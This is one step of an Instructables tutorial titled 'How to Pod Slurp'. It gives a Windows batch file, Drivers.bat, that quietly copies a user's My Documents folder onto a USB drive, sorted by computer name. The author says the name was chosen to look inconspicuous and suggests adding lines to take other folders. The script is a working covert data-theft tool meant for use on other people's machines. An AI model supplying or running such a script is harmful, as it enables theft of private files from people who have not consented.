3 Simple Ways to
Share What You Make

With Instructables you can share what you make with the world — and tap into an ever-growing community of creative experts.

PhotosPhotos

Share one or more photos of a project, recipe, or whatever you've made, quickly and easily.

Step by StepStep-By-Step

Share your step-by-step photos with text instructions of what you made so others can do it too!

VideoVideo

Share your how-to video. You'll need your embed code from a video site such as YouTube.

How to Pod Slurp

Step 5Making the Drivers.bat

Making the Drivers.bat
Finally we will make our last batch file. This file is the one that actually does the pod slurping. Once you've copied and pasted this into wordpad, or your word processor of choice, be sure to save it as Drivers.bat. Of course you can rename it anything you want as long as you go back into the Launch.bat file and change it to look for your renamed file. I just named mine Drivers so it looks a bit more inconspicuous. Also feel free to change the directory you would like to copy from My Documents to whatever you please. You can also add an additional duplicate line under the xcopy line with a different directory to copy other folders. Keep in mind this will take more time to copy, and more space on your storage device depending on the folder(s) chosen.

@echo off
mkdir %~d0\%computername%
xcopy "C:\Documents and Settings\%username%\My Documents" %~d0\%computername% /s/c/q/r/h
@cls
@exit
« Previous StepDownload PDFView All StepsNext Step »

Pro

Get More Out of Instructables

Already have an Account?

close

All Steps Viewing
View all steps of an Instructable on the same page when you're a Pro Member.

Upgrade to Pro today!
0
Followers
1
Author:Elementix